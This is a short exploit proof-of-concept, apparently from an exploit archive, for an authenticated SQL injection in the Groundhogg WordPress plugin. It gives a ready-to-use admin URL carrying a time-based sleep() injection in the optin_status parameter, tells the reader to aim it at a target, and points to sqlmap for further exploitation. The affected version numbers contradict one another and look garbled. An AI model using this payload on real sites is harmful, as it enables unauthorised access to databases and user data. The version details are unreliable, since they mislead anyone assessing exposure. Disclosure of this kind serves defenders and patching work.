|Proof of Concept
# Exploit Title: WordPress Groundhogg <= 18.104.22.168 Authenticated SQL Injection Vulnerability # Date: 23-10-2019 # Exploit Author: Lucian Ioan Nitescu # Contact: https://twitter.com/LucianNitescu # Webiste: https://nitesculucian.github.io # Vendor Homepage: https://www.groundhogg.io/ # Software Link: https://wordpress.org/plugins/groundhogg/ # Version: 22.214.171.124 # Tested on: Ubuntu 18.04 / WordPress 5.3 1. Description: WordPress Groundhogg plugin with a version lower than 126.96.36.199 is affected by an Authenticated SQL Injection vulnerability. 2. Proof of Concept: Authenticated SQL Injection: - Using an WordPress user, access <your target> /wp-admin/admin.php?page=gh_bulk_jobs&action=gh_export_contacts&optin_status%5B0%5D=(select*from(select(sleep(20)))a)&optin_status%5B1%5D=0 - The response will be returned after 20 seconds proving the successful exploitation of the vulnerability. - Sqlmap can be used to further exploit the vulnerability.